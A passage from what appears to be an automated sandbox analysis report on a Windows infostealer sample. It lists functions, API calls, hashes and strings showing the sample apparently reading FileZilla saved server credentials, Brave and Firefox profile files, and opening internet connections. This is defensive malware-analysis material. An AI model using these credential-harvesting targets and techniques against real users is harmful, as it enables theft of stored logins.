                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83E43
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83E77
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C83EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83F0D
                                • lstrlen.KERNEL32(00CA1794), ref: 00C83F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83F41
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C83F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83F75
                                • lstrlen.KERNEL32(?), ref: 00C83F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 00C83FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C83FE0
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8401F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C8402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C840CE
                                • lstrcat.KERNEL32(00000000), ref: 00C840DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C842D9
                                • FindClose.KERNEL32(00000000), ref: 00C842E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: 72c9be8abdc3f92bacb2278c75b03b1decec4325efe99e258e2aca4857a57460
                                • Instruction ID: 62998e0a647cbbcbcd42c24f5e2276251a482faa11f138565d16a7a5fb79156e
                                • Opcode Fuzzy Hash: 72c9be8abdc3f92bacb2278c75b03b1decec4325efe99e258e2aca4857a57460
                                • Instruction Fuzzy Hash: 3262B331A116169FCB21FFA5CC48AAFB7B9EF45704F098124F819A3251DB34EE05DB94
                                Function 00C86960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00C869C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C86A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00C86A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00C86AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C86B35
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86B9D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: 6f01cbadfd2d9091bb2c4ecd5cc832df819e7fde5afb5124f80b03ec0ffa5e46
                                • Instruction ID: 4a5333884f1add3df2a18d301b7428ea6d44b2dc59ad2d340bca7310481a901b
                                • Opcode Fuzzy Hash: 6f01cbadfd2d9091bb2c4ecd5cc832df819e7fde5afb5124f80b03ec0ffa5e46
                                • Instruction Fuzzy Hash: 5E42B330A01216AFCB11BBB5DC89A6F7BB9EF45704F188424F915E7242DB34EE05DB64
                                Function 00C7DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DBEF
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C7DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DC17
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C7DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DC4C
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DC8F
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C7DCD0
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C7DCF0
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C7DD0A
                                • lstrlen.KERNEL32(00C9CFEC), ref: 00C7DD1D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DD7B
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DDA3
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DDAF
                                • lstrlen.KERNEL32(?), ref: 00C7DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DE19
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7DE6F
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DE7B
                                • lstrlen.KERNEL32(01798AD8), ref: 00C7DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DEBB
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7DEE6
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DEF2
                                • lstrlen.KERNEL32(01798A88), ref: 00C7DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DFA5
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7DFB1
                                • lstrlen.KERNEL32(01798AD8), ref: 00C7DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7DFF4
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E022
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7E02E
                                • lstrlen.KERNEL32(01798A88), ref: 00C7E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00C7E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00C7E0E7
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E11F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C7E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E155
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E19F
                                • lstrcat.KERNEL32(00000000), ref: 00C7E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00C7E1F9
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7E22F
                                • lstrlen.KERNEL32(01798908), ref: 00C7E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C7E261
                                • lstrcat.KERNEL32(00000000,01798908), ref: 00C7E269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C7E988
                                • FindClose.KERNEL32(00000000), ref: 00C7E997
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: e3647b8661e4ef679021e51bb2dc0392ff05c4f819d4e25d267b621f37f10ee9
                                • Instruction ID: 24eb7d372ee92dc697cfde96182a4c5a92b527097764e9a5b4c12ea5d85da6ad
                                • Opcode Fuzzy Hash: e3647b8661e4ef679021e51bb2dc0392ff05c4f819d4e25d267b621f37f10ee9
                                • Instruction Fuzzy Hash: 32527271A112069FCB21EF65DC89AAE77B9EF59300F09C064F81AE7252DB34ED059B90
                                Function 00C760D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C760FF
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C76152
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C76185
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C761B5
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C761F0
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C76223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C76233
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 92f26b64795066c56bae4342775df5113b6bd88c30da7a27a615f2fb4b98aba1
                                • Instruction ID: ef763ccffbbb1e14a47ccdfd97ac9e0061b9cc1c30dab002fe5ff6464ebffacb
                                • Opcode Fuzzy Hash: 92f26b64795066c56bae4342775df5113b6bd88c30da7a27a615f2fb4b98aba1
                                • Instruction Fuzzy Hash: C8528B31A116169FCB21EBB5DC89AAE77B9EF48310F09C124F819E7252DB34ED05DB90
                                Function 00C86B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86B9D
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86BCD
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86BFD
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00C86C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C86C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C86C5A
                                • lstrlen.KERNEL32(00000000), ref: 00C86C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C86CE2
                                • lstrlen.KERNEL32(00000000), ref: 00C86CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00C86D6A
                                • lstrlen.KERNEL32(00000000), ref: 00C86D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C86DF2
                                • lstrlen.KERNEL32(00000000), ref: 00C86E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00C86E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C86EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00C86EC9
                                • LocalFree.KERNEL32(00000000), ref: 00C86ED4
                                • lstrlen.KERNEL32(?), ref: 00C86F6E
                                • lstrlen.KERNEL32(?), ref: 00C86F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: df07a4cb55333b28ede0a06cda024510c6a11dc0d8d2260a920e93c34451e521
                                • Instruction ID: 1224aff8002853769385b81241d242f06d4494fbe27afed26e572bccc00ed5d4
                                • Opcode Fuzzy Hash: df07a4cb55333b28ede0a06cda024510c6a11dc0d8d2260a920e93c34451e521
                                • Instruction Fuzzy Hash: 8A02B130A01206AFCB11BBB5DD8DA6F7BB9EF49704F188424F916E7242DB34ED059764
                                Function 00C84B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C84B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84B7F
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C84B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84BA7
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C84BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C84BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: 1177ae0df47270134a730467875970756bfa62f5b76f4d51d4c7be4cfca0ff26
                                • Instruction ID: 2a3517d63007f82bd70131dfee2c8fd1bf4c4e578020bc99576a395d86cc91ae
                                • Opcode Fuzzy Hash: 1177ae0df47270134a730467875970756bfa62f5b76f4d51d4c7be4cfca0ff26
                                • Instruction Fuzzy Hash: 2C925070A016128FDB24EF29C948B6AB7F5AF45318F19C0ADE819DB3A2D771ED41CB44
                                Function 00C81250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C81291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C812B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C812BF
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C812CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C812E7
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C812F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C8133A
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8135C
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C81376
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C813AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C813D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C813E2
                                • lstrlen.KERNEL32(00CA1794), ref: 00C813ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8140A
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C81416
                                • lstrlen.KERNEL32(?), ref: 00C81423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81443
                                • lstrcat.KERNEL32(00000000,?), ref: 00C81451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8147A
                                • StrCmpCA.SHLWAPI(?,0179D8F8), ref: 00C814A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C814E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81535
                                • StrCmpCA.SHLWAPI(?,0179DD50), ref: 00C81552
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81593
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C815BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C815E4
                                • StrCmpCA.SHLWAPI(?,0179D748), ref: 00C81602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C81633
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C81685
                                • StrCmpCA.SHLWAPI(?,0179D7D8), ref: 00C816B3
